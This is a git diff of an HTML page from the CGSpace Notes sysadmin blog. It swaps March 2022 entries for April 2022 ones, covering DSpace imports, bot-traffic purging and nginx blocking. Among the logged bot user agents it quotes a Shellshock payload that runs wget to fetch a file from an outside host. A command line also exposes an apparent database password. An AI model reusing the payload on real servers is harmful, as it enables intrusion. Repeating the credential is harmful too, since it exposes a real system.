Add notes for 2022-04-24
@@ -6,34 +6,18 @@
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta property="og:title" content="March, 2022" />
<meta property="og:description" content="2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
" />
<meta property="og:title" content="April, 2022" />
<meta property="og:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
<meta property="article:modified_time" content="2022-04-04T19:15:58+03:00" />
<meta property="article:published_time" content="2022-03-01T10:53:39+03:00" />
<meta property="article:modified_time" content="2022-04-23T13:05:02+03:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="March, 2022"/>
<meta name="twitter:description" content="2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
<meta name="twitter:title" content="April, 2022"/>
<meta name="twitter:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54."/>
<meta name="generator" content="Hugo 0.96.0" />
@@ -42,11 +26,11 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
{
  "@context": "http://schema.org",
  "@type": "BlogPosting",
  "headline": "March, 2022",
  "headline": "April, 2022",
  "url": "https://alanorth.github.io/cgspace-notes/2022-03/",
  "wordCount": "1836",
  "datePublished": "2022-03-01T16:46:54+03:00",
  "dateModified": "2022-04-04T19:15:58+03:00",
  "wordCount": "1048",
  "datePublished": "2022-03-01T10:53:39+03:00",
  "dateModified": "2022-04-23T13:05:02+03:00",
  "author": {
    "@type": "Person",
    "name": "Alan Orth"
@@ -59,7 +43,7 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-03/">

<title>March, 2022 | CGSpace Notes</title>
<title>April, 2022 | CGSpace Notes</title>

<!-- combined, minified CSS -->
@@ -111,352 +95,206 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
|
||||
|
||||
<article class="blog-post">
|
||||
<header>
|
||||
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">March, 2022</a></h2>
|
||||
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-03/">April, 2022</a></h2>
|
||||
<p class="blog-post-meta">
|
||||
<time datetime="2022-03-01T16:46:54+03:00">Tue Mar 01, 2022</time>
|
||||
<time datetime="2022-03-01T10:53:39+03:00">Tue Mar 01, 2022</time>
|
||||
in
|
||||
<span class="fas fa-folder" aria-hidden="true"></span> <a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
|
||||
|
||||
|
||||
</p>
|
||||
</header>
|
||||
<h2 id="2022-03-01">2022-03-01</h2>
|
||||
<h2 id="2022-04-01">2022-04-01</h2>
|
||||
<ul>
|
||||
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
|
||||
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">'fuuu'</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
|
||||
</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
|
||||
<li>I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday
|
||||
<ul>
|
||||
<li>Looking over the CGSpace Solr statistics from 2022-02
|
||||
<ul>
|
||||
<li>I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!</li>
|
||||
<li>Here are some of the more prevalent or weird ones:
|
||||
<ul>
|
||||
<li>axios/0.21.1</li>
|
||||
<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
|
||||
<li>Nutraspace/Nutch-1.2 (<a href="https://www.nutraspace.com">www.nutraspace.com</a>)</li>
|
||||
<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
|
||||
<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
|
||||
<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
|
||||
<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
|
||||
<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
|
||||
<li>metha/0.2.27</li>
|
||||
<li>ZaloPC-win32-24v454</li>
|
||||
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
|
||||
<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
|
||||
<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
|
||||
<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
|
||||
<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
|
||||
<li>() { :;}; /bin/bash -c "wget -O /tmp/bbb <a href="https://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>"</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
|
||||
</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
|
||||
</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
|
||||
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
|
||||
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
|
||||
</ul>
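<ul>
<li>For reference, that local override is just a plain text file of regular expression patterns, one per line, so adding entries looks roughly like this (an illustrative sketch using patterns from the list above, not the exact change):</li>
</ul>
<pre tabindex="0"><code>$ cat >> dspace/config/spiders/agents/ilri <<'EOF'
Faveeo\/[0-9]
Exploratodo\/[0-9]
Crowsnest\/[0-9]
EOF
</code></pre>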
<h2 id="2022-03-05">2022-03-05</h2>
|
||||
<ul>
|
||||
<li>Start AReS harvest</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-10">2022-03-10</h2>
|
||||
<ul>
|
||||
<li>A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
|
||||
<ul>
|
||||
<li>I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:</li>
|
||||
<li>The Discovery indexing took this long:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<pre tabindex="0"><code>or(
|
||||
isNotNull(value.match('707')),
|
||||
isNotNull(value.match('709')),
|
||||
isNotNull(value.match('710')),
|
||||
isNotNull(value.match('711')),
|
||||
isNotNull(value.match('713')),
|
||||
isNotNull(value.match('717')),
|
||||
isNotNull(value.match('718')),
|
||||
...
|
||||
isNotNull(value.match('821'))
|
||||
)
|
||||
</code></pre><ul>
|
||||
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Xmx1024m -Dfile.encoding=UTF-8"</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-10-tac-batch4-701to980.map
|
||||
</span></span></code></pre></div><h2 id="2022-03-12">2022-03-12</h2>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 334m33.625s
|
||||
</span></span><span style="display:flex;"><span>user 227m51.331s
|
||||
</span></span><span style="display:flex;"><span>sys 3m43.037s
|
||||
</span></span></code></pre></div><h2 id="2022-04-04">2022-04-04</h2>
|
||||
<ul>
|
||||
<li>Update all containers and rebuild OpenRXV on linode20:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">'s/ \+/:/g'</span> | cut -d: -f1,2 | xargs -L1 docker pull
|
||||
</span></span><span style="display:flex;"><span>$ docker-compose build
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Then run all system updates and reboot</li>
|
||||
<li>Start a full harvest on AReS</li>
|
||||
</ul>
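<ul>
<li>For the record, “run all system updates and reboot” on these Ubuntu hosts is roughly the following (a sketch, not the exact invocation):</li>
</ul>
<pre tabindex="0"><code># apt update && apt full-upgrade
# reboot
</code></pre>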
<h2 id="2022-03-16">2022-03-16</h2>
|
||||
<li>Help Marianne with submit/approve access on a new collection on CGSpace</li>
|
||||
<li>Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)</li>
|
||||
<li>Looking at the Solr statistics for 2022-03 on CGSpace
|
||||
<ul>
|
||||
<li>Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
|
||||
<ul>
|
||||
<li>We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing</li>
|
||||
<li>I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: <code>Apache-HttpClient/4.5.9 (Java/1.8.0_322)</code>, and many others with a normal browser agent, so that’s fishy!</li>
|
||||
<li>The DSpace agent pattern <code>http.?agent</code> seems to have caught the first ones, but I’ll purge the IP ones</li>
|
||||
<li>I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for <code>dns:*msnbot* AND dns:*.msn.com.</code> I see over 100,000, which is a problem I noticed a few months ago too…</li>
|
||||
<li>I extracted the MSN Bot IPs from Solr using an IP facet, then used the <code>check-spider-ip-hits.sh</code> script to purge them</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
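<ul>
<li>A sketch of that MSN Bot purge (assuming the IPs were first exported from a Solr <code>ip</code> facet into a plain text file, one address per line; the file name here is hypothetical):</li>
</ul>
<pre tabindex="0"><code>$ ./ilri/check-spider-ip-hits.sh -f /tmp/msnbot-ips.txt -p
</code></pre>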
<h2 id="2022-03-20">2022-03-20</h2>
|
||||
<h2 id="2022-04-10">2022-04-10</h2>
|
||||
<ul>
|
||||
<li>Start a full harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-21">2022-03-21</h2>
|
||||
<h2 id="2022-04-13">2022-04-13</h2>
|
||||
<ul>
|
||||
<li>Review a few submissions for Open Repositories 2022</li>
|
||||
<li>Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-22">2022-03-22</h2>
|
||||
<li>UptimeRobot mailed to say that CGSpace was down
|
||||
<ul>
|
||||
<li>I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
|
||||
<ul>
|
||||
<li>I had been meaning to update my local database…</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I re-imported the CGIAR CAS documents to <a href="https://dspacetest.cgiar.org/handle/10568/118432">DSpace Test</a> and generated the PDF thumbnails:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Xmx1024m -Dfile.encoding=UTF-8"</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-22-tac-700.map
|
||||
</span></span><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Xmx1024m -Dfile.encoding=UTF-8"</span> dspace filter-media -p <span style="color:#e6db74">"ImageMagick PDF Thumbnail"</span> -i 10568/118432
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>On my local environment I decided to run the <code>check-duplicates.py</code> script one more time with all 700 items:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
|
||||
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p <span style="color:#e6db74">'dom@in34sniper'</span> -o /tmp/2022-03-22-tac-duplicates.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
|
||||
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I sent the resulting 76 items to Gaia to check</li>
|
||||
<li>UptimeRobot said that CGSpace was down
|
||||
<ul>
|
||||
<li>I looked and found many locks belonging to the REST API application:</li>
|
||||
<li>I looked and found the load at 44…</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>There seem to be a lot of locks from the XMLUI:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;'</span> | grep -o -E <span style="color:#e6db74">'(dspaceWeb|dspaceApi)'</span> | sort | uniq -c | sort -n
|
||||
</span></span><span style="display:flex;"><span> 301 dspaceWeb
|
||||
</span></span><span style="display:flex;"><span> 2390 dspaceApi
|
||||
</span></span><span style="display:flex;"><span> 3173 dspaceWeb
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Looking at nginx’s logs, I found the top addresses making requests today:</li>
|
||||
<li>Looking at the top IPs in nginx’s access log one IP in particular stands out:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">'{print $1}'</span> /var/log/nginx/rest.log | sort | uniq -c | sort -h
|
||||
</span></span><span style="display:flex;"><span> 1977 45.5.184.2
|
||||
</span></span><span style="display:flex;"><span> 3167 70.32.90.172
|
||||
</span></span><span style="display:flex;"><span> 4754 54.195.118.125
|
||||
</span></span><span style="display:flex;"><span> 5411 205.186.128.185
|
||||
</span></span><span style="display:flex;"><span> 6826 137.184.159.211
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 941 66.249.66.222
|
||||
</span></span><span style="display:flex;"><span> 1224 95.108.213.28
|
||||
</span></span><span style="display:flex;"><span> 2074 157.90.209.76
|
||||
</span></span><span style="display:flex;"><span> 3064 66.249.66.221
|
||||
</span></span><span style="display:flex;"><span> 95743 185.192.69.15
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>137.184.159.211 is on DigitalOcean using this user agent: <code>GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28</code>
|
||||
<ul>
|
||||
<li>I blocked this IP in nginx and the load went down immediately</li>
|
||||
<li>185.192.69.15 is in the UK</li>
|
||||
<li>I added a block for that IP in nginx and the load went down…</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot</li>
|
||||
<li>54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)</li>
|
||||
<li>70.32.90.172 is on Media Temple and has no user agent</li>
|
||||
<li>What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
|
||||
<h2 id="2022-04-16">2022-04-16</h2>
|
||||
<ul>
|
||||
<li>I verified it works as expected with an empty user agent:</li>
|
||||
<li>Start harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-04-18">2022-04-18</h2>
|
||||
<ul>
|
||||
<li>I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter)
|
||||
<ul>
|
||||
<li>I see there are many locks in use from the XMLUI:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -H User-Agent:<span style="color:#e6db74">''</span> <span style="color:#e6db74">'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'</span>
|
||||
</span></span><span style="display:flex;"><span>Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;'</span> | grep -o -E <span style="color:#e6db74">'(dspaceWeb|dspaceApi)'</span> | sort | uniq -c
|
||||
</span></span><span style="display:flex;"><span> 8932 dspaceWeb
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I note that the nginx log shows ‘-’ for a request with an empty user agent, which would be indistinguishable from a request with a ‘-’, for example these were successful:</li>
|
||||
<li>Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
|
||||
</span></span><span style="display:flex;"><span>70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">'{print $1}'</span> | sort | uniq -c | sort -h
|
||||
</span></span><span style="display:flex;"><span> 752 69.162.124.231
|
||||
</span></span><span style="display:flex;"><span> 759 66.249.64.213
|
||||
</span></span><span style="display:flex;"><span> 864 66.249.66.222
|
||||
</span></span><span style="display:flex;"><span> 905 2a01:4f8:221:f::2
|
||||
</span></span><span style="display:flex;"><span> 1013 84.33.2.97
|
||||
</span></span><span style="display:flex;"><span> 1201 157.55.39.159
|
||||
</span></span><span style="display:flex;"><span> 1204 157.55.39.144
|
||||
</span></span><span style="display:flex;"><span> 1209 157.55.39.102
|
||||
</span></span><span style="display:flex;"><span> 1217 157.55.39.161
|
||||
</span></span><span style="display:flex;"><span> 1252 207.46.13.177
|
||||
</span></span><span style="display:flex;"><span> 1274 157.55.39.162
|
||||
</span></span><span style="display:flex;"><span> 2553 66.249.66.221
|
||||
</span></span><span style="display:flex;"><span> 2941 95.108.213.28
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too</li>
|
||||
<li>Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that</li>
|
||||
<li>One IP is using a strange user agent though:</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-24">2022-03-24</h2>
|
||||
<ul>
|
||||
<li>Maria from ABC asked about a reporting discrepancy on AReS
|
||||
<ul>
|
||||
<li>I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted
|
||||
<ul>
|
||||
<li>She asked if we can download them and upload them directly to CGSpace</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I re-created my local Artifactory container</li>
|
||||
<li>I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
|
||||
<ul>
|
||||
<li>One thing I realized is that OAI is no longer a standalone web application, it is part of the <code>server</code> app now: http://localhost:8080/server/oai/request?verb=Identify</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active
|
||||
<ul>
|
||||
<li>I did this on DSpace Test in 2022-02 so I just followed the same procedure</li>
|
||||
<li>After that I ran all system updates and rebooted the server</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
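<ul>
<li>The new DSpace 7 OAI endpoint mentioned above is easy to smoke test from the command line (assuming a local dev instance on port 8080):</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8080/server/oai/request?verb=Identify'
</code></pre>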
<h2 id="2022-03-25">2022-03-25</h2>
|
||||
<ul>
|
||||
<li>Looking at the PostgreSQL database size on CGSpace after the update yesterday:</li>
|
||||
</ul>
|
||||
<p><img src="/cgspace-notes/2022/03/postgres_size_cgspace-day.png" alt="PostgreSQL database size day"></p>
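<ul>
<li>A quick way to confirm what the graph shows from psql (assuming the production database is named <code>dspace</code>):</li>
</ul>
<pre tabindex="0"><code>$ psql -c "SELECT pg_size_pretty(pg_database_size('dspace'));"
</code></pre>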
<ul>
|
||||
<li>The space saving in indexes of recent PostgreSQL releases is awesome!</li>
|
||||
<li>Import a DSpace 6.x database dump from production into my local DSpace 7 database
|
||||
<ul>
|
||||
<li>I see I still have the same errors <a href="/cgspace-notes/2021-04/">I saw in 2021-04</a> when testing DSpace 7.0 beta 5</li>
|
||||
<li>I had to delete some old migrations, as well as all Atmire ones first:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
|
||||
</span></span><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%'
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Then I was able to migrate to DSpace 7 with <code>dspace database migrate ignored</code> as the <a href="https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace">DSpace upgrade notes say</a>
|
||||
<li>Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">'{print $1}'</span> | sort | uniq | wc -l
|
||||
</span></span><span style="display:flex;"><span>17314
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
|
||||
<ul>
|
||||
<li>I see that the <a href="https://github.com/DSpace/dspace-angular/issues/1357">flash of unstyled content bug</a> still exists on dspace-angular… ouch!</li>
|
||||
